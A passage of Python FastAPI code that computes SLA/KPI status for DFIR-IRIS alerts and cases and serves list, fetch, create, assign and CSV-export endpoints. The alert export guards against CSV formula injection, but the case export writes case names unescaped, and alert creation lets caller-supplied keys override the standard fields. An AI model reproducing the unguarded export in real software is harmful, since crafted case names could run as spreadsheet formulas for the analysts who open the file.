"Resolved", "segments": segments, "resolved": True, } elapsed = (datetime.now(timezone.utc) - start).total_seconds() elapsed_pct = min(elapsed / sla * 100, 100) kpi_pct = max(100 - elapsed_pct, 0) segments = [{"label": l, "color": c, "active": elapsed_pct >= t} for l, c, t in thresholds] if kpi_pct >= 80: status = "On Track" elif kpi_pct >= 60: status = "Watch" elif kpi_pct >= 40: status = "Warning" elif kpi_pct >= 20: status = "Urgent" elif kpi_pct > 0: status = "Critical" else: status = "Breached" return { "kpi_pct": round(kpi_pct, 1), "elapsed_pct": round(elapsed_pct, 1), "status": status, "segments": segments, "resolved": 
False, } def _enrich_alerts_with_kpi(iris_response: dict) -> dict: """Inject kpi field into each alert row returned by IRIS. IRIS GET /api/v2/alerts returns: { "total": N, "data": [...], ... } """ alerts = iris_response.get("data", []) if not isinstance(alerts, list): return iris_response for alert in alerts: created_at = alert.get("alert_creation_time") or "" severity = (alert.get("severity") or {}).get("severity_name", "Medium") if not created_at: continue resolved_at: str | None = None if alert.get("alert_resolution_status_id") is not None: history: dict = alert.get("modification_history") or {} if history: last_ts = max(history.keys(), key=lambda k: float(k)) resolved_at = datetime.fromtimestamp(float(last_ts), tz=timezone.utc).isoformat() try: alert["kpi"] = compute_kpi(created_at, severity, resolved_at) except Exception: alert["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False} return iris_response def _enrich_cases_with_kpi(iris_response: dict) -> dict: # v2 cases list: { "data": [...], "total": N, ... 
} # Each case uses open_date / close_date / state.state_name / severity_id _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} # severity_id → name cases = iris_response.get("data") or iris_response.get("items", []) if not isinstance(cases, list): return iris_response for case in cases: created_at = case.get("open_date") or "" if not created_at: continue sev_id = case.get("severity_id") or 1 severity = _CASE_SEV.get(int(sev_id), "Medium") resolved_at = None close_date = case.get("close_date") state_name = ((case.get("state") or {}).get("state_name") or "").lower() if close_date: resolved_at = close_date elif state_name == "closed": resolved_at = created_at try: case["kpi"] = compute_kpi(created_at, severity, resolved_at) except Exception: case["kpi"] = {"kpi_pct": 0, "elapsed_pct": 100, "status": "Breached", "segments": [], "resolved": False} return iris_response @app.get( "/iris/cases/export-csv", summary="Export IRIS cases as CSV", description="Download all cases (up to 1000) with KPI as a CSV attachment.", ) async def iris_export_cases_csv() -> StreamingResponse: try: raw = await iris_adapter.list_cases(limit=1000, offset=0) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case export failed: {exc}") from exc enriched = _enrich_cases_with_kpi(raw) cases = enriched.get("data") or enriched.get("items", []) _CASE_SEV: dict[int, str] = {1: "Medium", 4: "Low", 5: "High", 6: "High"} output = io.StringIO() fieldnames = ["case_id", "case_name", "severity", "state", "open_date", "close_date", "kpi_pct", "kpi_status"] writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore") writer.writeheader() for case in cases: kpi = case.get("kpi", {}) writer.writerow({ "case_id": case.get("case_id", ""), "case_name": case.get("case_name", ""), "severity": _CASE_SEV.get(int(case.get("severity_id") or 1), "Medium"), "state": (case.get("state") or {}).get("state_name", ""), "open_date": case.get("open_date", ""), 
"close_date": case.get("close_date", ""), "kpi_pct": kpi.get("kpi_pct", ""), "kpi_status": kpi.get("status", ""), }) output.seek(0) return StreamingResponse( iter([output.getvalue()]), media_type="text/csv", headers={"Content-Disposition": "attachment; filename=iris_cases.csv"}, ) @app.get( "/iris/cases/{case_id}", response_model=ApiResponse, summary="Get single IRIS case with KPI", description="Fetch one DFIR-IRIS case by ID and annotate with computed KPI data.", ) async def iris_get_case(case_id: int) -> ApiResponse: try: raw = await iris_adapter.get_case(case_id) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case fetch failed: {exc}") from exc wrapper = {"data": [raw]} enriched = _enrich_cases_with_kpi(wrapper) case_out = enriched["data"][0] if enriched.get("data") else raw return ApiResponse(data={"case": case_out}) @app.get( "/iris/cases", response_model=ApiResponse, summary="List IRIS cases with KPI", description="Fetch cases from DFIR-IRIS and annotate each with computed KPI data.", ) async def iris_list_cases( page: int = 1, per_page: int = 20, sort_by: str = "case_id", sort_dir: str = "desc", filter_name: str | None = None, ) -> ApiResponse: # adapter maps (limit, offset) → (per_page, page) for IRIS v2 offset = (page - 1) * per_page try: raw = await iris_adapter.list_cases(limit=per_page, offset=offset) except Exception as exc: raise HTTPException(status_code=502, detail=f"IRIS case list failed: {exc}") from exc enriched = _enrich_cases_with_kpi(raw) items = enriched.get("data") or enriched.get("items", []) total = enriched.get("total", len(items)) last_page = enriched.get("last_page", max(1, -(-total // per_page))) if filter_name: items = [c for c in items if filter_name.lower() in (c.get("case_name") or "").lower()] reverse = sort_dir == "desc" items.sort(key=lambda c: c.get(sort_by) or 0, reverse=reverse) return ApiResponse(data={"cases": { "data": items, "total": total, "current_page": page, "last_page": last_page, }}) 
@app.post(
    "/iris/alerts",
    response_model=ApiResponse,
    summary="Create IRIS alert",
    description="Create a new alert in DFIR-IRIS via /api/v2/alerts.",
)
async def iris_create_alert(payload: IrisAlertCreateRequest) -> ApiResponse:
    """Create a DFIR-IRIS alert from the request model.

    When the request gives no customer, ``settings.iris_default_customer_id``
    is used. ``alert_source_event_time`` is stamped with the current UTC time.
    Keys in ``payload.payload`` are merged last, so they override any of the
    standard fields built here.

    Raises:
        HTTPException: 502 when the IRIS adapter call fails.
    """
    # Annotated with ``object``: ``typing.Any`` is not imported in this module.
    alert_payload: dict[str, object] = {
        "alert_title": payload.title,
        "alert_description": payload.description,
        "alert_severity_id": payload.severity_id,
        "alert_status_id": payload.status_id,
        "alert_source": payload.source,
        "alert_customer_id": payload.customer_id or settings.iris_default_customer_id,
        "alert_source_event_time": datetime.now(timezone.utc).isoformat(),
    }
    if payload.source_ref:
        alert_payload["alert_source_ref"] = payload.source_ref
    if payload.payload:
        alert_payload.update(payload.payload)
    try:
        result = await iris_adapter.create_alert(alert_payload)
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"IRIS alert create failed: {exc}") from exc
    return ApiResponse(data={"alert": result})


@app.get(
    "/iris/alerts",
    response_model=ApiResponse,
    summary="List IRIS alerts with KPI Timeout",
    description="Fetch alerts from DFIR-IRIS and annotate each row with computed KPI Timeout data.",
)
async def iris_list_alerts(
    page: int = 1,
    per_page: int = 20,
    sort_by: str = "alert_id",
    sort_dir: str = "desc",
    filter_title: str | None = None,
    filter_owner_id: int | None = None,
) -> ApiResponse:
    """List IRIS alerts, forwarding paging/sort/filter options, with KPI data added.

    Raises:
        HTTPException: 502 when fetching or post-processing the IRIS response fails.
    """
    try:
        raw = await iris_adapter.list_alerts(
            page=page,
            per_page=per_page,
            sort_by=sort_by,
            sort_dir=sort_dir,
            filter_title=filter_title,
            filter_owner_id=filter_owner_id,
        )
        enriched = _enrich_alerts_with_kpi(raw)
        return ApiResponse(data={
            "alerts": {
                "data": enriched.get("data", []),
                "total": enriched.get("total", 0),
                "current_page": enriched.get("current_page", page),
                "last_page": enriched.get("last_page", 1),
            }
        })
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"IRIS alert list failed: {exc}") from exc


@app.get(
    "/iris/alerts/export-csv",
    summary="Export IRIS alerts as CSV",
    description="Download all matching alerts (up to 1000) as a CSV attachment.",
)
async def iris_export_alerts_csv(
    sort_by: str = "alert_id",
    sort_dir: str = "desc",
    filter_title: str | None = None,
    filter_owner_id: int | None = None,
) -> StreamingResponse:
    """Stream up to 1000 matching IRIS alerts, with KPI data, as a CSV attachment.

    Text cells that begin with a spreadsheet formula character are prefixed
    with a single quote. Alert titles originate from external telemetry and
    must not execute as formulas when the file is opened in Excel or Sheets.

    Raises:
        HTTPException: 502 when the IRIS adapter call fails.
    """

    def _csv_cell(value: object) -> object:
        # OWASP CSV-injection guard: neutralise leading = + - @ TAB CR.
        if isinstance(value, str) and value.startswith(("=", "+", "-", "@", "\t", "\r")):
            return "'" + value
        return value

    try:
        raw = await iris_adapter.list_alerts(
            page=1,
            per_page=1000,
            sort_by=sort_by,
            sort_dir=sort_dir,
            filter_title=filter_title,
            filter_owner_id=filter_owner_id,
        )
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"IRIS alert export failed: {exc}") from exc

    enriched = _enrich_alerts_with_kpi(raw)
    alerts = enriched.get("data", []) if isinstance(enriched, dict) else []
    if not isinstance(alerts, list):
        alerts = []

    output = io.StringIO()
    fieldnames = [
        "alert_id",
        "alert_title",
        "alert_severity",
        "alert_status",
        "alert_creation_time",
        "alert_source_event_time",
        "alert_owner",
        "kpi_pct",
        "kpi_status",
    ]
    writer = csv.DictWriter(output, fieldnames=fieldnames, extrasaction="ignore")
    writer.writeheader()
    for alert in alerts:
        if not isinstance(alert, dict):
            continue
        kpi = alert.get("kpi", {})
        row = {
            "alert_id": alert.get("alert_id", ""),
            "alert_title": alert.get("alert_title", ""),
            "alert_severity": (alert.get("severity") or {}).get("severity_name", ""),
            "alert_status": (alert.get("status") or {}).get("status_name", ""),
            "alert_creation_time": alert.get("alert_creation_time", ""),
            "alert_source_event_time": alert.get("alert_source_event_time", ""),
            "alert_owner": (alert.get("owner") or {}).get("user_name", ""),
            "kpi_pct": kpi.get("kpi_pct", ""),
            "kpi_status": kpi.get("status", ""),
        }
        writer.writerow({key: _csv_cell(value) for key, value in row.items()})
    output.seek(0)
    return StreamingResponse(
        iter([output.getvalue()]),
        media_type="text/csv",
        headers={"Content-Disposition": "attachment; filename=iris_alerts.csv"},
    )


@app.get(
    "/iris/alerts/{alert_id}",
    response_model=ApiResponse,
    summary="Get single IRIS alert with KPI",
    description="Fetch one DFIR-IRIS alert by ID and annotate with computed KPI data.",
)
async def iris_get_alert(alert_id: int) -> ApiResponse:
    """Fetch one IRIS alert and annotate it with KPI data.

    A non-dict adapter payload is replaced by an empty dict before enrichment.

    Raises:
        HTTPException: 502 when the IRIS adapter call fails.
    """
    try:
        raw = await iris_adapter.get_alert(alert_id)
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"IRIS alert fetch failed: {exc}") from exc
    # Wrap in list-shaped dict so _enrich_alerts_with_kpi can process it
    alert = raw if isinstance(raw, dict) else {}
    wrapper = {"data": [alert]}
    enriched = _enrich_alerts_with_kpi(wrapper)
    alert_out = enriched["data"][0] if enriched.get("data") else alert
    return ApiResponse(data={"alert": alert_out})


@app.post(
    "/iris/alerts/{alert_id}/assign",
    response_model=ApiResponse,
    summary="Assign IRIS alert to owner",
    description="Update the owner of a DFIR-IRIS alert.",
)
async def iris_assign_alert(alert_id: int, body: dict) -> ApiResponse:
    """Assign an IRIS alert to the user given by ``body["owner_id"]``.

    Raises:
        HTTPException: 422 when ``owner_id`` is not an integer; 502 when the
            IRIS adapter call fails.
    """
    owner_id = body.get("owner_id")
    # bool is a subclass of int, so JSON true/false would otherwise pass as an id.
    if isinstance(owner_id, bool) or not isinstance(owner_id, int):
        raise HTTPException(status_code=422, detail="owner_id must be an integer")
    try:
        result = await iris_adapter.assign_alert(alert_id=alert_id, owner_id=owner_id)
        return ApiResponse(data=result)
    except Exception as exc:
        raise HTTPException(status_code=502, detail=f"IRIS alert assign failed: {exc}") from exc